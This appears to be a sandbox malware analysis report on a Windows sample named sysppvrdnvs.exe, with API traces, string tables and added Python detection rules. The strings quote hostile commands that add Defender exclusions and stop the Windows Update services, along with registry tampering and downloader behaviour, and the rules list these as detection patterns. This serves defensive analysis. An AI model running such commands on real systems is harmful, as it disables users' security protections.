                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                    • Opcode ID: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
                                                                                                                                    • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                    • Opcode Fuzzy Hash: b647c8863bd145a6cdb3b694a2789b5223e0cbd1e96795d6a7d9ca1e1965b3ae
                                                                                                                                    • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                    APIs
                                                                                                                                    • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                    • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                    • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph not recoverable from the extraction; entry block 407940-407974 Sleep CreateMutexA GetLastError, with the block-by-block API sequence listed under APIs below)
APIs
• Sleep.KERNEL32(000007D0), ref: 0040794E
• CreateMutexA.KERNEL32(00000000,00000000,mmn7nnm8na), ref: 0040795D
• GetLastError.KERNEL32 ref: 00407969
• ExitProcess.KERNEL32 ref: 00407978
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000105), ref: 004079B2
• PathFindFileNameW.SHLWAPI(C:\Windows\sysppvrdnvs.exe), ref: 004079BD
• wsprintfW.USER32 ref: 004079DA
• DeleteFileW.KERNEL32(?), ref: 004079EA
• ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
• wcscmp.NTDLL ref: 00407A13
• ExitProcess.KERNEL32 ref: 00407A32
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysppvrdnvs.exe$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                    • API String ID: 4172876685-2793809833
                                                                                                                                    • Opcode ID: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                    • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                    • Opcode Fuzzy Hash: 6c3aa08d7c4c4069ddcf3c5aed638cf34e8cb556e5cf3fb678ad37c5e5b78497
                                                                                                                                    • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 0040F569
• srand.MSVCRT ref: 0040F570
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
• strlen.NTDLL ref: 0040F59A
• mbstowcs.NTDLL ref: 0040F5B1
• rand.MSVCRT ref: 0040F5B9
• rand.MSVCRT ref: 0040F5CD
• wsprintfW.USER32 ref: 0040F5F4
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
• CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
• wsprintfW.USER32 ref: 0040F6F4
• DeleteFileW.KERNEL32(?), ref: 0040F704
• Sleep.KERNEL32(000003E8), ref: 0040F70F
• Sleep.KERNEL32(000007D0), ref: 0040F730
• ExitProcess.KERNEL32 ref: 0040F758
• DeleteFileW.KERNEL32(?), ref: 0040F76E
• CloseHandle.KERNEL32(000000FF), ref: 0040F77B
• InternetCloseHandle.WININET(00000000), ref: 0040F788
• InternetCloseHandle.WININET(00000000), ref: 0040F795
• Sleep.KERNEL32(000003E8), ref: 0040F7A0
• rand.MSVCRT ref: 0040F7B5
• Sleep.KERNEL32 ref: 0040F7C6
• rand.MSVCRT ref: 0040F7CC
• rand.MSVCRT ref: 0040F7E0
• wsprintfW.USER32 ref: 0040F807
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
• wsprintfW.USER32 ref: 0040F844
• DeleteFileW.KERNEL32(?), ref: 0040F854
• Sleep.KERNEL32(000003E8), ref: 0040F85F
• Sleep.KERNEL32(000007D0), ref: 0040F880
• ExitProcess.KERNEL32 ref: 0040F8A7
• DeleteFileW.KERNEL32(?), ref: 0040F8B6
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
• String ID: y@$%s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
• API String ID: 1632876846-3348571888
• Opcode ID: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
• Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
• Opcode Fuzzy Hash: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
• Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
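The two function entries above give a responder a compact set of host artifacts to hunt for: the persistence routine (mutex mmn7nnm8na, copy to C:\Windows\sysppvrdnvs.exe, a Run entry, Security Center *Override / *DisableNotify values, Windows Update policy values, Start values for the five update services, the sc stop chain and the Add-MpPreference exclusions) and the downloader that writes %temp%\%d%d.exe, a name built from two MSVCRT rand() results (each 0..32767, so 2 to 10 decimal digits), then deletes the file's :Zone.Identifier stream. The Python below is an added detection example, not code from the report or from the sample: it runs rules derived from those string tables over a constructed batch of Sysmon-style events. The event schema, the registry data values, and "Windows Settings" as the Run value name are assumptions (the report shows key and value names but not the data written).

```python
import re

# Indicator lists taken from the string table of the persistence function above.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "dosvc", "bits"}
SECURITY_CENTER_VALUES = {
    "AntiVirusOverride", "AntiVirusDisableNotify", "AntiSpywareOverride",
    "FirewallOverride", "FirewallDisableNotify",
    "UpdatesOverride", "UpdatesDisableNotify",
}
WU_POLICY_VALUES = {
    "DisableWindowsUpdate", "EnableWindowsUpdate", "NoAutoUpdate",
    "AutoUpdateOptions", "AlwaysAutoUpdate", "PreventDownload",
}
SERVICE_DISABLED = 4  # SCM start type SERVICE_DISABLED (assumed to be what the sample writes)

_SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", re.IGNORECASE)
_MP_EXCLUSION = re.compile(r"add-mppreference\s+-exclusionpath", re.IGNORECASE)
_SERVICE_KEY = re.compile(r"^system\\currentcontrolset\\services\\([^\\]+)$")
# The sample drops itself directly under %windir% (report: C:\Windows\sysppvrdnvs.exe), not System32.
_WINDIR_ROOT_EXE = re.compile(r"^(c:\\windows|%windir%)\\[^\\]+\.exe$")
# Downloader names files %temp%\%d%d.exe from two rand() calls: a 2..10 digit stem.
_TEMP_NUMERIC_EXE = re.compile(r"\\temp\\(\d{2,10})\.exe$")


def _norm_key(key: str) -> str:
    """Strip the hive prefix and trailing backslash, lower-case for comparison."""
    key = re.sub(r"^(HKEY_LOCAL_MACHINE|HKLM|HKEY_CURRENT_USER|HKCU)\\", "", key, flags=re.I)
    return key.rstrip("\\").lower()


def classify(ev: dict) -> list:
    """Return the rule names a single event triggers (empty list if none)."""
    hits = []
    if ev["type"] == "process":
        cmd = ev["cmdline"]
        if _MP_EXCLUSION.search(cmd):
            hits.append("defender_exclusion_added")
        if {m.group(1).lower() for m in _SC_STOP.finditer(cmd)} & UPDATE_SERVICES:
            hits.append("update_services_stopped")
    elif ev["type"] == "registry_set":
        key, name = _norm_key(ev["key"]), ev["value"]
        if key.startswith("software\\microsoft\\security center") and name in SECURITY_CENTER_VALUES:
            hits.append("security_center_override")
        if (key.startswith("software\\policies\\microsoft\\windows\\windowsupdate")
                or key.startswith("software\\policies\\microsoft\\windows\\updateorchestrator")) \
                and name in WU_POLICY_VALUES:
            hits.append("windows_update_policy_tamper")
        m = _SERVICE_KEY.match(key)
        if m and m.group(1) in UPDATE_SERVICES and name == "Start" and ev["data"] == SERVICE_DISABLED:
            hits.append("update_service_disabled")
        if key.endswith("\\currentversion\\run") and _WINDIR_ROOT_EXE.match(str(ev["data"]).strip('"').lower()):
            hits.append("run_key_in_windows_root")
    elif ev["type"] == "file_create":
        if _TEMP_NUMERIC_EXE.search(ev["path"].lower()):
            hits.append("temp_numeric_exe_dropped")
    elif ev["type"] == "file_delete":
        if ev["path"].lower().endswith(":zone.identifier"):
            hits.append("motw_stream_removed")
    return hits


def triage(events: list) -> dict:
    """Map rule name -> indices of the events that triggered it."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            findings.setdefault(rule, []).append(i)
    return findings


# Constructed events mirroring the report's strings; not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": 'cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; '
                                   'Add-MpPreference -ExclusionPath $env:TEMP"'},
    {"type": "process", "cmdline": "cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & "
                                   "sc stop DoSvc & sc stop BITS /wait"},
    {"type": "registry_set", "key": "HKLM\\SOFTWARE\\Microsoft\\Security Center\\Svc",
     "value": "AntiVirusOverride", "data": 1},
    {"type": "registry_set", "key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU",
     "value": "NoAutoUpdate", "data": 1},
    {"type": "registry_set", "key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv",
     "value": "Start", "data": 4},
    {"type": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
     "value": "Windows Settings", "data": "C:\\Windows\\sysppvrdnvs.exe"},
    {"type": "file_create", "path": "C:\\Users\\user\\AppData\\Local\\Temp\\1748223501.exe"},
    {"type": "file_delete", "path": "C:\\Users\\user\\AppData\\Local\\Temp\\1748223501.exe:Zone.Identifier"},
    # Benign noise: an unrelated service disabled, a normal Run entry, an installer in %temp%.
    {"type": "registry_set", "key": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Spooler", "value": "Start", "data": 4},
    {"type": "registry_set", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "OneDrive", "data": "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"},
    {"type": "file_create", "path": "C:\\Users\\user\\AppData\\Local\\Temp\\setup_x64.exe"},
]

if __name__ == "__main__":
    for rule, idx in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{rule:32s} events {idx}")
```

The rules are deliberately narrow (exact value names, the five service names, the %windir% root) so that the benign events at the end of the batch stay quiet; when porting them to a SIEM, keep the service and value lists as they are and loosen only the path matching to fit the collector's normalisation.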

Control-flow Graph
Control-flow graph (rendered graph not captured; basic blocks recovered from the graph data): 40b850-40b867 call 40b780; 40b86e-40b88a call 40b3d0 strcmp; 40b891-40b8ad, 40b8af-40b8cb, 40b8cd-40b8e9, 40b8f0-40b90c, 40b90e-40b92a, 40b92c-40b948, 40b94f-40b96b, 40b96d-40b989, 40b98b-40b9a7 each call 40b3d0 strstr; 40b9ae-40b9c4 EnterCriticalSection; 40b9ec-40ba05 call 40df20; 40ba09-40ba14 call 40bb00; 40ba2e-40ba3f call 40a740; 40ba45-40ba62 call 40df20; 40ba76-40ba7e Sleep; 40ba80-40bab8 call 40ab60; 40bad8-40bae3 call 40bb00; 40bae5 call 40b530; 40baea-40baef LeaveCriticalSection; 40baf5-40baf8
APIs
  • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
  • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
• strcmp.NTDLL ref: 0040B880
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: gethostbynamegethostnamestrcmp
• String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
• API String ID: 2906596889-2213908610
• Opcode ID: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
• Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
• Opcode Fuzzy Hash: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
• Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE
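The entry above resolves the host's own name (gethostname, gethostbyname) and then runs one strcmp and nine strstr calls whose operands are the ten strings in the String ID line: 0.0.0.0 plus the fragments 10., 127., 192. and their dotted middle and trailing forms. In other words, the sample classifies the address by text fragments rather than by prefix length. The Python below is an added illustration, not the sample's code: it reconstructs that test as prefix/infix/suffix substring checks (an assumption about how the ten strings are combined; the report does not show their order or which branch a match takes) and compares it with a CIDR membership test for the ranges the fragments appear to aim at (unspecified, loopback and RFC 1918 space, also an inference). The test addresses are constructed.

```python
import ipaddress

# Fragments from the string table above, grouped by how they read as dotted-quad tests.
# Treating "0.0.0.0" as the strcmp operand and the other nine as substring tests is an
# assumption about the sample; the report shows the strings and call counts only.
EXACT = "0.0.0.0"
PREFIXES = ("10.", "127.", "192.")      # first octet
INFIXES = (".10.", ".127.", ".192.")    # a middle octet
SUFFIXES = (".10", ".127", ".192")      # last octet


def fragment_filter(ip: str) -> bool:
    """Reconstruction of the string-based check: True if any fragment matches."""
    if ip == EXACT:
        return True
    return (any(ip.startswith(p) for p in PREFIXES)
            or any(i in ip for i in INFIXES)
            or any(ip.endswith(s) for s in SUFFIXES))


# The ranges the fragments look intended to cover (assumption): unspecified, RFC 1918, loopback.
SPECIAL_NETS = [ipaddress.ip_network(n) for n in
                ("0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def cidr_filter(ip: str) -> bool:
    """Prefix-length membership test for the same intent."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SPECIAL_NETS)


def divergences(ips) -> list:
    """Addresses on which the substring heuristic and the CIDR test disagree."""
    return [ip for ip in ips if fragment_filter(ip) != cidr_filter(ip)]


# Constructed addresses (private and documentation ranges); not taken from the report.
SAMPLE_IPS = ["10.1.2.3", "127.0.0.1", "192.168.1.5", "0.0.0.0", "8.8.8.8",
              "172.30.5.6",       # RFC 1918, but no fragment covers 172.16/12: missed
              "192.0.2.44",       # any 192.x.x.x matches although only 192.168/16 is private
              "1.10.20.30",       # ".10." in a middle octet: false positive
              "198.51.100.127"]   # last octet 127: false positive

if __name__ == "__main__":
    for ip in SAMPLE_IPS:
        print(f"{ip:16s} fragment={fragment_filter(ip)!s:5s} cidr={cidr_filter(ip)}")
```

The divergence list is the useful output: the heuristic never recognises 172.16.0.0/12 and over-matches any address with 10, 127 or 192 in any octet. That matters when predicting which hosts the sample treats as local and when reproducing its behaviour in a lab whose address plan uses 172.16/12.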

Control-flow Graph
Control-flow graph (rendered graph not captured; basic blocks recovered from the graph data): 4059b0-4059d2 GetWindowLongW; 405a04-405a21 SetClipboardViewer SetWindowLongW; 405a2e-405a44 SetWindowLongW; 405a4c-405a5c SendMessageA; 405a67-405a78, 405a83-405a8d, 405a98-405aa2 IsClipboardFormatAvailable; 405ab5-405abf OpenClipboard; 405ac5-405ad6 GetClipboardData; 405add-405aee GlobalLock; 405b16-405b27 call 405680; 405b29-405b3c call 40d250; 405b3e-405b4e call 4057f0; 405b51-405b65 GlobalUnlock CloseClipboard; 405b67-405b7c call 404970 call 40ab60; 405b85-405b95 SendMessageA; 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain; 405be4-405bfd DefWindowProcA
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004059BC
• SetClipboardViewer.USER32(?), ref: 00405A08
• SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
• OpenClipboard.USER32(00000000), ref: 00405AB7
• GetClipboardData.USER32(00000000), ref: 00405AC9
• RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
• ChangeClipboardChain.USER32(?,?), ref: 00405BDE
• DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
• String ID:
• API String ID: 3549449529-0
• Opcode ID: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
• Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
• Opcode Fuzzy Hash: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
• Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000104), ref: 00406F90
                                                                                                                                      • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                      • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                      • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                    • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                      • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                      • Part of subcall function 004063E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                      • Part of subcall function 004063E0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                      • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                      • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                    • wsprintfW.USER32 ref: 00407072
                                                                                                                                    • wsprintfW.USER32 ref: 00407092
                                                                                                                                    • wsprintfW.USER32 ref: 004070B5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                     • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                     • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysppvrdnvs.exe$Unnamed volume
                                                                                                                                    • API String ID: 1650488544-747518629
                                                                                                                                    • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                    • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                    • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A
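Added worked example (not code from the Joe Sandbox report or from the sample). The routine above reads GetLogicalDrives, queries the Explorer NoDrives policy value (a 4-byte REG_DWORD, matching the 00000004 buffer size in the trace), then for each drive calls GetVolumeInformationW and GetDiskFreeSpaceExW, divides the size by 0x40000000 with _aulldiv and formats it with the "%s%s", "(%dGB)" and "Unnamed volume" strings. The Python below models that enumeration offline with constructed inputs standing in for the Win32 calls. Two points are assumptions rather than facts from the trace: that drives hidden by NoDrives are skipped, and that "%s%s" simply appends one entry per line.

```python
"""
Added example, not code from the Joe Sandbox report or from the sample.

Models the drive-enumeration routine the API trace suggests:
GetLogicalDrives -> NoDrives policy -> GetVolumeInformationW ->
GetDiskFreeSpaceExW -> _aulldiv by 0x40000000 -> wsprintfW "%s%s (%dGB)".
The Win32 calls are replaced by constructed inputs so it runs offline.
Assumptions: hidden drives are skipped; "%s%s" joins entries line by line.
"""
from __future__ import annotations

GIB = 0x40000000  # divisor handed to _aulldiv in the trace: 1024**3 bytes


def drive_letters(logical_drives_mask: int, nodrives_mask: int = 0) -> list[str]:
    """Decode the 26-bit masks used by both GetLogicalDrives() and the
    HKLM\\...\\Policies\\Explorer\\NoDrives REG_DWORD: bit n is drive
    chr(ord('A') + n).  A letter that is present but hidden by policy is
    skipped (assumption, see module docstring)."""
    present = []
    for bit in range(26):
        if (logical_drives_mask >> bit) & 1 and not (nodrives_mask >> bit) & 1:
            present.append(f"{chr(ord('A') + bit)}:\\")
    return present


def describe_volume(label: str, total_bytes: int) -> str:
    """Mirror the format strings in the trace: an empty label becomes
    'Unnamed volume', and the size is reduced to whole GiB with unsigned
    integer division, which is what _aulldiv does on the 64-bit total."""
    name = label if label else "Unnamed volume"
    return f"{name} ({total_bytes // GIB}GB)"


def build_report(volumes: dict[str, tuple[str, int]], nodrives_mask: int = 0,
                 logical_drives_mask: int | None = None) -> str:
    """Build the text such a routine would report.  `volumes` maps 'X:\\'
    to (label, total_bytes), standing in for the GetVolumeInformationW and
    GetDiskFreeSpaceExW results.  If no GetLogicalDrives() value is given it
    is derived from the dict keys."""
    if logical_drives_mask is None:
        logical_drives_mask = 0
        for root in volumes:
            logical_drives_mask |= 1 << (ord(root[0].upper()) - ord("A"))
    lines = []
    for root in drive_letters(logical_drives_mask, nodrives_mask):
        if root not in volumes:
            continue
        label, size = volumes[root]
        lines.append(f"{root} {describe_volume(label, size)}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Constructed sample inputs (not from the report); C: is hidden by policy.
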